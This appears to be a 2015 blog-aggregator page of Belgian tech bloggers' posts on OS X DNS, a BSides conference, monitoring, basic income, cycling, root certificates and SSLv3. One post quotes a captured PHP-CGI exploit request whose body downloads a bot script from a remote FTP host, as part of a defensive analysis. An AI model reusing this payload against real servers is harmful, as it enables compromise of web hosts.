    0   274  Fri10am /usr/libexec/discoveryd_helper --loglevel Detailed --logclass Everything --logto asl

Before 10.10, and now back with the release of 10.10.4, mDNSResponder is running.

$ ps -ef | grep mDNS
   65    91     1   0 12:43pm ??         0:00.44 /usr/sbin/mDNSResponder

Ars Technica has a pretty good summary of the supposed reasons for the rewrite and the gotchas, this one in particular.

As of OS X 10.10, mDNSResponder has been replaced by discoveryd. Curiously, discoveryd is (re)written in C++, not exactly one of Apple's favorite languages.

Why DNS in OS X 10.10 is broken, and what you can do to fix it

Apple's move here deserves a repeat of what Joel on Software has been preaching for a very long time.

There's a subtle reason that programmers always want to throw away the code and start over. The reason is that they think the old code is a mess. And here is the interesting observation: they are probably wrong. The reason that they think the old code is a mess is because of a cardinal, fundamental law of programming:

It's harder to read code than to write it.

Things You Should Never Do, Part I

Since to the outside world, there didn't seem to be any reason to replace mDNSResponder, the move must have come from the inside. Engineers wanting to replace ageing software with something new.

In particular, Joel's 15 year old blogpost (!!) notes that rewriting software always destroys some of the gathered knowledge: years of bug fixing and feature adding.

When you throw away code and start from scratch, you are throwing away all that knowledge. All those collected bug fixes. Years of programming work.

There are very legit reasons to rewrite software as well. But whenever I'm thinking of rewriting something from scratch, I hope I remember Joel's words and Apple's fiasco.

The post Rewriting software from scratch, a lesson learned from Mac OSX 10.10.4’s discoveryd appeared first on ma.ttias.be.

by Mattias Geniar at July 05, 2015 11:09 AM

July 03, 2015

Xavier Mertens

BSidesLisbon 2015 Wrap-Up

Here is a quick wrap-up of the just-ended BSidesLisbon event. This is the second edition of this BSides event organized in Portugal. The philosophy of those events is well known: organized by and for the community, free, open and creating a lot of opportunities to meet peers. A classic but effective setup: talks, lightning talks, a CTF and two tracks in parallel. Here is a review of the ones I attended.

The day started with my friend Wim Remes‘s keynote: “Damn kids, they’re all alike“. Wim’s message was: “learn and share”. He started with a review of the hacker’s manifesto. Written in 1986, it remains so relevant today. Key values are:

Wim addressed the problem of the infosec community vs the industry. Even if a clear distinction is needed, at a certain point we have to move forward and take our responsibilities by putting our knowledge to work inside companies and organizations. If some security researchers are seen as rockstars (or want to be one), that's not the best way to behave. Some of Wim's slides were nice, with good quotes. I particularly liked this one:

Your knowledge is a weapon, you are a threat

The keynote was followed by a series of very interesting questions and exchange of ideas.

The first talk was given by Doron Shiloach from IBM X-Force: “Taking threat intelligence to the next level”. Doron started with a review of  the threat intelligence topic, based on a definition by Gartner. From an industry perspective, criteria for evaluation are:

The next part was dedicated to the techniques for building good threat intelligence and where to find the right information. Once done, we need to make it available, not only between humans but also between computers. To achieve this, Doron introduced TAXII and STIX. Personally, I found the talk too focused on IBM X-Force services… but anyway, interesting stuff was presented.

For the next time slot, there was only one presentation; the other speaker was not able to attend the event. The tool Shellter was presented by its developer Kyriakos Economou. After explaining why classic shellcode injection sucks, Kyriakos presented his tool in detail. Shellter is a dynamic shellcode injector with only one goal: evade antivirus detection! The presentation ended with nice demos of maliciously generated files not being detected by AV products! The joy of seeing a scan result on virustotal.com: 0/55!

After the lunch break, I followed Ricardo Dias's presentation about malware clustering. By cluster, we mean here a group of malware samples that share similar structure or behaviour. Ricardo's daily job is to detect malicious code and, to improve this task, he developed a tool to create clusters based on multiple pieces of information about the PE files (only this file type is analyzed). Ricardo explained in detail how clusters are created. He used popular algorithms for this: reHash or impHash. The next part of the presentation was based on demos of the tool created by Ricardo. I was impressed by the quality and accuracy of the information made available through the clusters!

The next talk also focused on security visualization. Tiago Henriques and Tiago Martins presented "Security Metrics: Why, where and how?". Given the amount of data that we have to manage today and the multiple sources it comes from, it has become very difficult to analyze it all without proper tools. That was the topic presented by Tiago & Tiago, after explaining how to use visualization tools in the right way and answering questions like:

They demonstrated how to extract nice information from important datasets.

Then, Pedro Vilaça presented his research about malicious kernel modules in OSX: "BadXNU, a rotten apple!". For sure, never, ever leave your MacBook unattended close to Pedro! Normally, to load a new module into the OSX kernel, checks are performed, like verifying the module signature. Pedro explained how to bypass this and inject malicious code into the kernel. For Pedro, Apple's checks are weak: they should be performed at ring 0 (kernel level) and not in userland (like Microsoft does). Impressive talk!

Finally, my last talk was the one by Tiago Pereira: "What botnet is this?". The talk was a summary of a malware analysis involving a DGA, or "Domain Generation Algorithm". The goal was to reverse engineer the malware to understand the DGA algorithm used. Also very interesting, especially when he explained how to bypass the packing of the binary to extract the code!

Unfortunately, I was not able to attend the last keynote, presented by Steve Lord; I hope that the slides will be available somewhere. The day ended with the speaker dinner (thanks to the organizers for the invitation!) in a relaxed atmosphere. Now it's the weekend and I'll spend some good time with my wife in sunny Lisbon!

by Xavier at July 03, 2015 10:06 PM

Dieter Plaetinck

Focusing on open source monitoring. Joining raintank.

Goodbye Vimeo

It's never been as hard saying goodbye to the people and the work environment as it is now.
Vimeo was created by dedicated film creators and enthusiasts just over 10 years ago, and today it still shows. From the quirky, playful office culture and the staff-created short films, to the tremendous curation effort and staff picks, including monthly staff screenings where we get to see the best of the best videos on the Internet each month, to the dedication towards building the best platform and community on the web to enjoy videos and the uncompromising commitment to supporting movie creators and working in their best interest.
Engineering wise, there has been plenty of opportunity to make an impact and learn.
Nonetheless, I have to leave and I'll explain why. First I want to mention a few more things.

vimeo goodbye drink

In Belgium I used to hitchhike to and from work so that each day brought me opportunities to have conversations with a diverse, fantastic assortment of people. I still fondly remember some of those memories. (and it was also usually faster than taking the bus!)
Here in NYC this isn't really feasible, so I tried the next best thing. A mission to have lunch with every single person in the company, starting with those I don't typically interact with. I managed to have lunch with 95 people, get to know them a bit, find some gems of personalities and anecdotes, and have conversations on a tremendous variety of subjects, some light-hearted, some deep and profound. It was fun and I hope to be able to keep doing such social experiments in my new environment.

Vimeo is also part of my life in an unusually personal way. When I came to New York (my first ever visit to the US) in 2011 to interview, I also met a pretty fantastic woman in a random bar in Williamsburg. We ended up traveling together in Europe, I decided to move to the US, and we moved in together. I've had the pleasure of being immersed in both American and Greek culture for the last few years, but the best part is that today we are engaged and I feel like the luckiest guy in the world. While I've tried to keep work and personal life somewhat separate, Vimeo has made an undeniable, everlasting impact on my life that I'm very grateful for.

At Vimeo I found an area where a bunch of my interests converge: operational best practices, high performance systems, number crunching, statistics and open source software. Specifically, timeseries metrics processing in the context of monitoring. While I have enjoyed the opportunity to make contributions in this space to help our teams and other companies who end up using my tools, I want to move out of the cost center of the company and into the department that creates the value. If I want to focus on open source monitoring, I should align my incentives with those of my employer, both for my sake and theirs. I want to make more profound contributions to the space. The time has come for me to join a company whose main focus is making open source monitoring better.

Hello raintank!

Over the past two years or so I've talked to many people in the industry about monitoring, many of them trying to bring me into their team. I never found a perfect fit but as we transitioned from 2014 into 2015, the stars seemingly aligned for me. Here's why I'm very excited to join the raintank crew:

OK, so what am I really up to?

Grafana is pretty much the leading open source metrics dashboard right now, so it only makes sense that raintank is a heavy Grafana user and contributor. My work, logically, revolves around codifying some of the experience and ideas I have and making them accessible through the polished interface that is Grafana, which now also has a full-time UX designer working on it. Since, according to the Grafana user survey, alerting is the most sorely missed non-feature of Grafana, we are working hard on rectifying this and it is my full-time focus. If you've followed my blog you know I have some thoughts on where the sweet spot lies in clever alerting. In short, take the claims of anomaly detection via machine learning with a big grain of salt and instead focus on enabling operators to express complex logic simply, quickly, and in an agile way. My latest favorite project, bosun, exemplifies this approach (I highly recommend giving it a close look).

The way I'm thinking of it now, the priorities (and sequence of focus) for alerting within Grafana will probably be something like this:

There's a lot of thought work, UX and implementation detail around this topic, so I've created a GitHub ticket to kick off a discussion and am curious to hear your thoughts. Finally, if any of this sounds interesting to you, you can sign up to the Grafana newsletter or the raintank newsletter, which will get you info on the open source platform as well as the SaaS product. Both are fairly low volume.


It may look like I'm not doing much from my temporary Mill Valley office, but trust me, cool stuff is coming!

July 03, 2015 04:22 PM

Frank Goossens

Music from Our Tube; the Jadim De Castro groove

Junior Jack's E-Samba is a nice dance classic, but the groove, melody and lyrics were written a long time ago by Jadim De Castro as "Negra Sem Sandalia", which was featured in "Orfeu Negro", a re-interpretation of the Greek legend of Orpheus and Eurydice by Marcel Camus, set against the backdrop of the carnival in Brazil.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at July 03, 2015 02:53 PM

July 02, 2015

Dieter Plaetinck

Moved blog to hugo, fastly and comma

July 02, 2015 11:35 PM

July 01, 2015

Dries Buytaert

One year later: the Acquia Certification Program

A little over a year ago we launched the Acquia Certification Program for Drupal. We ended the first year with close to 1,000 exams taken, which exceeded our goal of 300-600. Today, I'm pleased to announce that the Acquia Certification Program passed another major milestone, with over 1,000 exams passed (not just taken).

People have debated the pros and cons of software certifications for years (including myself) so I want to give an update on our certification program and some of the lessons learned.

Acquia's certification program has been a big success. A lot of Drupal users require Acquia Certification; from the Australian government to Johnson & Johnson. We also see many of our agency partners use the program as a tool in the hiring process. While a certification exam can not guarantee someone will be great at their job (e.g. we only test for technical expertise, not for attitude), it does give a frame of reference to work from. The feedback we have heard time and again is how the Acquia Certification Program is tough, but fair; validating skills and knowledge that are important to both customers and partners.

We were also listed in the Certification Magazine Salary Survey as having one of the most desired credentials to obtain. For a first-year program to be identified among certification leaders like Cisco and Red Hat speaks volumes about the respect our program has established.

Creating a global certification program is resource intensive. We've learned that it requires the commitment of a team of Drupal experts to work on each and every exam. We now have four different exams: developer, front-end specialist, backend specialist and site builder. It roughly takes 40 work days for the initial development of one exam, and about 12 to 18 work days for each exam update. We update all four of our exams several times per year. In addition to creating and maintaining the certification programs, there is also the day-to-day operations for running the program, which includes providing support to participants and ensuring the exams are in place for testing around the globe, both on-line and at test centers. However, we believe that effort is worth it, given the overall positive effect on our community.

We also learned that benefits are an important part of the program for participants and that we need to raise the profile of those who achieve these credentials, especially those with the new Acquia Certified Grand Master credential (those who passed all three developer exams). We have a special Grand Master Registry and look to create a platform for these Grand Masters to help share their expertise and thoughts. We do believe that if you have a Grand Master working on a project, you have a tremendous asset working in your favor.

At DrupalCon LA, the Acquia Certification Program offered a test center at the event, and we ended up having 12 new Grand Masters by the end of the conference. We saw several companies stepping up to challenge their best people to achieve Grand Master status. We plan to offer the testing at DrupalCon Barcelona, so take advantage of the convenience of the on-site test center and the opportunity to meet and talk with Peter Manijak, who developed and leads our certification efforts, myself and an Acquia Certified Grand Master or two about Acquia Certification and how it can help you in your career!

by Dries at July 01, 2015 01:31 PM

June 29, 2015

Lionel Dricot

The 5 answers to those who want to preserve jobs


 

If you have been redirected to this page, it's because, one way or another, you worried about preserving a certain type of job, or maybe even proposed ideas to save or create jobs.

The 5 arguments against preserving jobs

Each argument can be explored further by clicking the appropriate link(s).

1. The primary purpose of technology is to make our lives easier and, consequently, to reduce our work. Destroying jobs is therefore not a side effect of anything: it is the primary goal our species has been pursuing for millennia! And we are succeeding! Why would we want to go backwards in order to reach inefficient full employment?

2. Not working is not a problem. Not having money to live on is. Unfortunately, we tend to confuse work and welfare. We are convinced that only work brings in money, but that is a completely mistaken belief. To go further: What is work?

3. Wanting to create jobs amounts to digging holes just to fill them back in. It is not only stupid, it is also counterproductive, and amounts to building the most inefficient society possible!

4. If creating/preserving jobs is an admissible argument in a debate, then absolutely anything can be justified: from the destruction of our natural resources to torture and the death penalty, by way of sacrificing thousands of lives on the roads. This is what I call the executioner's argument.

5. Whatever your profession, it will be done better, faster and cheaper by software within the coming decade. This is obvious when you think of taxi/Uber drivers, but it also includes artists, politicians and even company executives.

 

Conclusion: worrying about jobs is dangerously backward-looking. It isn't easy, because this superstition is drilled into our heads, but it is essential to move on to the next stage. Whether we like the idea or not, we already live in a society where not everyone works. That is a fact, and the future does not care about your opinion. The question is therefore not how to create or preserve jobs, but how to organize ourselves in a society where jobs are scarce.

Personally, I think that a basic income, in one form or another, is an avenue worth exploring seriously.

 

Photo by Friendly Terrorist.

Thank you for taking the time to read this freely priced post. Feel free to support me with a few milliBitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.


by Lionel Dricot at June 29, 2015 06:51 PM

Bert de Bruijn

How to solve "user locked out due to failed logins" in vSphere vMA

In vSphere 6, if the vi-admin account gets locked because of too many failed logins and you don't have the root password of the appliance, you can reset the account(s) using these steps:

  1. reboot the vMA
  2. from GRUB, "e"dit the entry
  3. "a"ppend init=/bin/bash
  4. "b"oot
  5. # pam_tally2 --user=vi-admin --reset
  6. # passwd vi-admin # Optional. Only if you want to change the password for vi-admin.
  7. # exit
  8. reset the vMA
  9. log in with vi-admin
These steps can be repeated for root or any other account that gets locked out.

If you do have root or vi-admin access, "sudo pam_tally2 --user=mylockeduser --reset" would do it, no reboot required.
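
If you just want to see whether (and how badly) an account is locked before touching it, pam_tally2 without --reset only displays the failure counter. A minimal check, assuming you already have a root or vi-admin shell on the appliance, could be:

# print the current failure count for vi-admin without clearing it
$ sudo pam_tally2 --user=vi-admin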

by Bert de Bruijn (noreply@blogger.com) at June 29, 2015 01:13 PM

Laurent Bigonville

systemd integration is the “ps” command

In Debian, since version 2:3.3.10-1, the procps package has had the systemd integration bits enabled. This means that the "ps" command can now display which (user) unit started a process, or to which slice or scope it belongs.

For example with the following command:

ps  -eo pid,user,command,unit,uunit,slice

(Screenshot of the resulting ps output.)
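
If you only care about the processes of one service, the same columns can be requested for a specific command. A small, hedged example (assuming sshd is running on the machine) would be:

ps -o pid,user,unit,uunit,slice -C sshd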

by bigon at June 29, 2015 10:29 AM

June 27, 2015

Mattias Geniar

The Broken State of Trust In Root Certificates


Yesterday news came out that Microsoft has quietly pushed new Root Certificates via its Windows Update system.

The change happened without any notifications, without any KB and without anyone really paying attention to it.

Earlier this month, Microsoft has quietly started pushing a bunch of new root certificates to all supported Windows systems. What is concerning is that they did not announce this change in any KB article or advisory, and the security community doesn't seem to have noticed this so far.

Even the official Microsoft Certificate Program member list makes no mention of these changes whatsoever.

Microsoft quietly pushes 18 new trusted root certificates

This just goes to show how fragile our system of trust really is. Adding new Root Certificates to an OS essentially gives the owner of those certificates (indirect) root privileges on the system.

It may not allow direct root access to your machines, but it allows them to publish certificates your PC/server blindly trusts.

This is an open door for phishing attacks with drive-by downloads.

I think this demonstrates two major problems with the SSL certificates we have today:

  1. Nobody checks which root certificates are currently trusted on your machine(s).
  2. Our software vendors can push new Root Certificates in automated updates without anyone knowing about it.

Both problems come back to the basis of trust.

Should we blindly trust our OS vendors to be able to ship new Root Certificates without confirmation, publication or dialog?

Or do we truly not care at all, as demonstrated by the fact we don't audit/validate the Root Certificates we have today?
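
For what it's worth, auditing the first problem doesn't require special tooling. On Windows, the built-in certutil can dump the machine's trusted Root store, and diffing that output over time is a crude but workable check. A sketch, not an official procedure (the file names are just placeholders):

C:\> certutil -store Root > root-store.txt
C:\> fc root-store.txt root-store-last-month.txt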

The post The Broken State of Trust In Root Certificates appeared first on ma.ttias.be.

by Mattias Geniar at June 27, 2015 12:53 PM

June 26, 2015

Xavier Mertens

Attackers Make Mistakes But SysAdmins Too!

A few weeks ago I blogged about "The Art of Logging" and explained why it is important to log efficiently to increase the chances of catching malicious activity. There are other ways to catch bad guys, especially when they make errors; after all, they are human too! But it goes the other way around with system administrators too. Last week, a customer asked me to investigate a suspicious alert reported by an IDS. It looked like a restricted web server (read: one which was not supposed to be publicly available!) was hit by an attack coming from the wild Internet.

The attack was nothing special: it was a bot scanning for websites vulnerable to the rather old PHP CGI-BIN vulnerability (CVE-2012-1823). The initial HTTP request looked strange:

POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%
75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F
%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%
66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6
E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A
%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%
3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3
D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F
%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Oracle-ECID: 252494263338,0
ClientIP: xxx.xxx.xxx.xxx
Chronos: aggregate
SSL-Https: off
Calypso-Control: H_Req,180882440,80
Surrogate-Capability: orcl="webcache/1.0 Surrogate/1.0 ESI/1.0 ESI-Inline/1.0 ESI-INV/1.0 ORAESI/9.0.4 POST-Restore/1.0"
Oracle-Cache-Version: 10.1.2
Connection: Keep-Alive, Calypso-Control

<? system("cd /tmp;wget ftp://xxxx:xxxx\@xxx.xxx.xxx.xxx/bot.php"); ?>

Once decoded, the HTTP query looks familiar:

POST //cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input –n

Did you see that the 'Host' header contains an invalid value ('-c')? I tried to understand this header, but to me it looks like a bug in the attacker's code. RFC 2616 covers the HTTP/1.1 protocol and, more precisely, how requests must be formed; a valid request looks like this:

$ nc blog.rootshell.be 80
GET / HTTP/1.1
Host: blog.rootshell.be
HTTP/1.1 200 OK

In the case above, the request was clearly malformed and the reverse proxy sitting in front of the web server decided to forward it to its default web server. If a reverse proxy can't find a valid host to send the incoming request to, it will, based on its configuration, use the default one. Let's take an Apache config:

NameVirtualHost *
<VirtualHost *>
DocumentRoot /siteA/
ServerName www.domainA.com
</VirtualHost>
<VirtualHost *>
DocumentRoot /siteB/
ServerName www.domainB.com
</VirtualHost>

In this example, Apache will use the first block if no other matching block is found. If we query a virtual host 'www.domainC.com', we will receive the homepage of 'www.domainA.com'. Note that such a configuration may expose sensitive data to the wild or expose a vulnerable server to the Internet. To prevent this, always add a default site with an extra block on top of the configuration:

<VirtualHost *>
DocumentRoot /defaultSite/
</VirtualHost>

This site can be configured as a "last resort web page" (as implemented in many load balancers), and why not run a honeypot there to collect juicy data? Conclusion: from a defender's point of view, try to isolate invalid queries as much as possible and log everything. From an attacker's point of view, always try malformed HTTP queries; maybe you will find interesting websites hosted on the same server!
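
To see for yourself which site your stack serves when the Host header is junk, a quick hedged test (replace www.domainA.com with one of your own hosts) could look like this:

$ curl -s -H 'Host: -c' http://www.domainA.com/ | head
$ printf 'GET / HTTP/1.1\r\nHost: does-not-exist.example\r\nConnection: close\r\n\r\n' | nc www.domainA.com 80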

by Xavier at June 26, 2015 10:21 PM

Mattias Geniar

RFC 7568: SSL 3.0 Is Now Officially Deprecated


The IETF has taken an official stance in the matter: SSL 3.0 is now deprecated.

It's been a long time coming. Like many others, we've had SSL 3.0 disabled on all our servers for multiple years now. And I'm now happy to report the IETF is making the end of SSL 3.0 "official".

The Secure Sockets Layer version 3.0 (SSLv3), as specified in RFC 6101, is not sufficiently secure. This document requires that SSLv3 not be used.

The replacement versions, in particular, Transport Layer Security (TLS) 1.2 (RFC 5246), are considerably more secure and capable protocols.

RFC 7568: Deprecating Secure Sockets Layer Version 3.0

Initiatives like disablessl3.com have been around for quite a while, urging system administrators to disable SSLv3 wherever possible. With POODLE as its best-known attack, the death of SSLv3 is a very welcome one.
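
For reference, dropping SSLv3 is usually a one-line change. Hedged examples for Apache and nginx (adapt them to your own TLS policy), plus a check that the handshake now fails, could look like this:

# Apache (mod_ssl)
SSLProtocol all -SSLv3
# nginx
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
# verification (only meaningful if your local openssl still has SSLv3 support compiled in)
$ openssl s_client -connect example.com:443 -ssl3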

The RFC targets everyone using SSL 3.0: servers as well as clients.

Pragmatically, clients MUST NOT send a ClientHello with ClientHello.client_version set to {03,00}.

Similarly, servers MUST NOT send a ServerHello with ServerHello.server_version set to {03,00}. Any party receiving a Hello message with the protocol version set to {03,00} MUST respond with a "protocol_version" alert message and close the connection.

SSL is dead. Long live TLS 1.2(*).

(*) while it lasts.

The post RFC 7568: SSL 3.0 Is Now Officially Deprecated appeared first on ma.ttias.be.

by Mattias Geniar at June 26, 2015 07:39 PM

Frank Goossens

Music from Our Tube; Souldancing on a Friday

While listening to random old "It is what it is" shows (thanks, Laurent), I heard this re-issue of Heiko Laux's Souldancer. Now go have some fun, you kids!

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 26, 2015 11:25 AM

June 25, 2015

Joram Barrez

All Activiti Community Day 2015 Online

As promised in my previous post, here are the recordings of the talks done by our awesome community people. The order below is the order in which they were planned in the agenda (no favouritism!). Sadly, the camera battery died during the recording of the talks before lunch. As such, the talks of Yannick Spillemaeckers […]

by Joram Barrez at June 25, 2015 12:04 PM

June 23, 2015

Lionel Dricot

"Gravel", or when cyclists chew gravel

Warning: this bolg really is a bolg about cyclimse. Thanks for your understanding!

In this article, I'd like to introduce a cycling discipline that is very popular in the United States: "gravel grinding", literally grinding gravel, more often simply called "gravel".

But for those who aren't familiar with cycling, I'll first explain why there are several types of bikes and several ways of riding a bike.

The different types of cycling

You have surely noticed that the bikes ridden by Tour de France racers are very different from the mountain bike your little niece just got.

A road cyclist, by Tim Shields.

Indeed, depending on the course, the cyclist faces different obstacles. On a long road in windy conditions, the cyclist is mainly held back by air resistance, so he needs to be aerodynamic. On a narrow mountain switchback, the cyclist fights gravity and therefore needs to be as light as possible. On the other hand, on a rocky trail descending between the trees, the cyclist's main concern is keeping the wheels in contact with the ground and not breaking his equipment; the bike must therefore absorb shocks and the roughness of the terrain as much as possible.

Finally, a utility bike aims to maximize the rider's comfort and the bike's practicality, even at the cost of a drastic drop in performance.

 

Technological trade-offs

Today, bikes are therefore classified according to their use. A very aerodynamic bike is used for time-trial competitions or triathlons. For classic races, the pros use an "aero" road bike, or an ultralight bike in the mountains.

An aerodynamic time-trial bike, by Marc

To ride in the woods, you'd rather have a mountain bike, but mountain bikes themselves come in several flavours, the furthest removed from the road bike being the downhill bike, which is very heavy, loaded with suspension and, as its name suggests, only usable going downhill.

That said, most of these categories are tied to technological constraints. Couldn't we imagine an ultralight bike (suited to the mountains) that is also ultra-aerodynamic (suited to the road or time trials) and ultra-comfortable (suited to the city)? Yes, we can imagine it. It isn't possible yet and nothing says it ever will be. But it isn't theoretically impossible.

 

The physical trade-off

There is, however, one trade-off that is physically indisputable: efficiency versus damping. Any damping entails a loss of efficiency; that is unavoidable.

Damping has two functions: keeping the bike in contact with the road even on an uneven surface, and preserving the physical integrity of the bike and, indeed, the comfort of the rider.

The cyclist moves forward by applying a force to the road through the cranks and the tyres. The action-reaction principle means the road applies a proportional force to the bike, which makes it move forward.

Damping, on the other hand, is meant to dissipate the forces transmitted to the bike by the road. Physically, it is therefore clear that efficiency and damping are diametrically opposed.

A downhill bike, by Matthew.

To convince yourself, just borrow a bike fitted with suspension and set it to maximum damping. Then try to climb a steeply rising road for several hundred metres. You will immediately feel that every pedal stroke is partially absorbed by the bike.

 

Show me your tyres and I'll tell you who you are…

The main shock absorber present on every type of bike, without exception, is the tyre. A tyre is filled with air, and compressing that air cushions the shocks.

A widespread idea holds that road bikes have thin tyres because wide tyres increase friction with the road. That is completely wrong. In fact, every tyre seeks maximum grip on the road, because that grip is what transmits the energy. A tyre that doesn't grip the road spins out, which is what we want to avoid at all costs.

It has even been shown that wider tyres transmit more energy to the road and are more efficient. That is one of the reasons Formula 1 cars have very wide tyres.

However, very wide tyres also mean more air and therefore more damping. Wide tyres thus dissipate more energy with every pedal stroke!

Mountain bike wheels, by Vik Approved.

That is why road bikes have very thin tyres (between 20 and 28 mm wide), inflated to very high pressure (over 6 bar). Since the amount of air is very small and highly compressed, damping is minimal.

On the other hand, by deforming, wide tyres can hug the contours of uneven ground. By absorbing shocks, they are also less prone to punctures. That is why mountain bikes have tyres that are generally more than 40 mm wide and inflated to lower pressure (between 2 and 4 bar). Thinner tyres would spin out (loss of grip) and puncture at the slightest impact.

In short, the tyre is certainly the element that defines a bike the most; it is truly its identity card. To learn more, here is a very interesting link about tyre rolling resistance.

 

Between the road bike and the mountain bike

So we have defined two big families of sporting bikes. First, road bikes, with tyres under 30 mm, built for speed on a relatively smooth surface but unable to ride off the tarmac. Then mountain bikes, with tyres over 40 mm, able to go anywhere but so inefficient on the road that it's better to drive them by car to wherever you want to ride. There are plenty of other types of bikes, but they are less performance-oriented: the city bike, inspired by the mountain bike, which optimizes practicality; the "Dutch bike", which optimizes comfort in a perfectly flat country with well-maintained cycle paths; or the fixie, which optimizes the hipster factor of its owner.

But couldn't we imagine a performance-oriented bike that would be efficient on the road and could go anywhere a mountain bike goes?

To answer that question, we have to turn to a discipline that is particularly popular in Belgium: cyclocross. Cyclocross consists of taking a road bike, fitting it with slightly wider tyres (between 30 and 35 mm) and riding it through the mud in winter. When the mud gets too deep or the terrain too steep, the rider dismounts, shoulders the machine and runs while carrying it. The idea is that, in those situations, it is faster to run (10-12 km/h) than to pedal (8-10 km/h) anyway.

A cyclocross racer, by Sean Rowe

A cyclocross bike must therefore be light (so it can be carried) and able to ride and corner in the mud, but with minimal damping so it performs on the smoothest sections.

This kind of setup turns out to be quite efficient on the road: a cyclocross bike cruises past 30 km/h without difficulty, but it can also keep up with a traditional mountain bike on forest trails. The reduced damping will, however, force you to slow down on very rough descents, and the most technical climbs on the greasiest ground will require carrying the bike (sometimes with the unexpected result of overtaking mountain bikers spinning away in their lowest gear).

 

The birth of gravel

While a road race can be run over long distances between a start and a finish, cyclocross, mountain biking and the other disciplines are traditionally confined to a short circuit that the competitors lap several times. The first reason is that nowadays it is hard to design a long course that doesn't end up on the road.

Moreover, while motorbikes and cars can accompany road bikes to provide food, technical assistance and media coverage, the same is not true for mountain bikes. It is therefore impossible to properly film a mountain bike or cyclocross race contested over dozens of kilometres through the woods.

The kind of road that gives the discipline its name.

The underlying idea of gravel is to free ourselves from those constraints and to offer long races (sometimes several hundred kilometres) between a start and a finish, but going over trails, sunken lanes and, above all, those long gravel roads that criss-cross the United States between the fields and that gave the discipline its name. Stretches of asphalt road are also possible.

Feed stations are set up by the organizers along the course but, between those points, the rider is mostly left to fend for himself. Carrying inner tubes, repair gear and sticking plasters is therefore part of the sport!

As for media coverage, it is now handled by the riders themselves, thanks to cameras mounted on the bikes or on the helmets.

 

The rise of gravel

Deep down, there is nothing really new here. The word "gravel" is just a new label stuck onto a discipline as old as the bicycle itself. But that word has allowed a rebirth and a recognition of the concept.

The success of on-board videos of riders covering 30 km across the fields and 10 km on asphalt before attacking 500 m of muddy climbs and crossing a river carrying their bikes has helped popularize gravel, mainly in the United States, where cyclocross is also booming.

The popularity of races like Barry-Roubaix (you can't make that up!) or the Gold Rush Gravel Grinder has caught the attention of manufacturers, who are starting to offer frames, tyres and gear specially designed for gravel.

 

Taking up gravel?

Unlike road racing or circuit mountain biking, gravel has a romantic side. Adventure, getting lost, exploring and discovering are an integral part of the discipline. In the Deux Norh team, for example, rides are called "hunts". The point is not so much the athletic feat as telling an adventure, a story.

The author of these lines during a climb through the woods.

Gravel being, in essence, a compromise, cyclocross bikes are often the best suited for it. In fact, many experienced cyclists say that if they could only keep one bike to do everything, it would be their cyclocross bike. That said, it is entirely possible to ride gravel on a hardtail mountain bike (no rear suspension). The mountain bike is more comfortable and gets through the technical sections more easily, at the cost of a lower speed on the faster-rolling sections. For the sandiest courses, some even go for ultra-wide tyres ("fat bikes").

On the other hand, I have never yet seen a gravel club or a single organized race in Belgium. That is why I invite Belgian cyclists to join the Belgian Gravel Grinders team on Strava, so that lone gravel riders can band together and, why not, organize group rides.

If the adventure tempts you, don't hesitate to join the team on Strava. And if you happen to be buying a new bike and are hesitating between a mountain bike and a road bike, take a look at cyclocross bikes. You never know when you might suddenly feel like chewing some gravel!

 

Cover photo by the author.

Thank you for taking the time to read this freely priced post. Feel free to support me with a few milliBitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.


by Lionel Dricot at June 23, 2015 04:17 PM

Dries Buytaert

Winning back the Open Web

The web was born as an open, decentralized platform allowing different people in the world to access and share information. I got online in the mid-nineties when there were maybe 100,000 websites in the world. Google didn't exist yet and Steve Jobs had not yet returned to Apple. I remember the web as an "open web" where no one was really in control and everyone was able to participate in building it. Fast forward twenty years, and the web has taken the world by storm. We now have hundreds of millions of websites. Look beyond the numbers and we see another shift: the rise of a handful of corporate "walled gardens" like Facebook, Google and Apple that are becoming both the entry point and the gatekeepers of the web. Their dominance has given rise to major concerns.

We call them "walled gardens" because they control the applications, content and media on their platform. Examples include Facebook or Google, which control what content we get to see; or Apple, which restricts us to running approved applications on iOS. This is in contrast to the "open web", where users have unrestricted access to applications, content and media.

Facebook is feeling the heat from Google, Google is feeling the heat from Apple but none of these walled gardens seem to be feeling the heat from an open web that safeguards our privacy and our society's free flow of information.

This blog post is the result of people asking questions and expressing concerns about a few of my last blog posts like the Big Reverse of the Web, the post-browser era of the web is coming and my DrupalCon Los Angeles keynote. Questions like: Are walled gardens good or bad? Why are the walled gardens winning? And most importantly; how can the open web win? In this blog post, I'd like to continue those conversations and touch upon these questions.

Are "walled gardens" good or bad for the web?

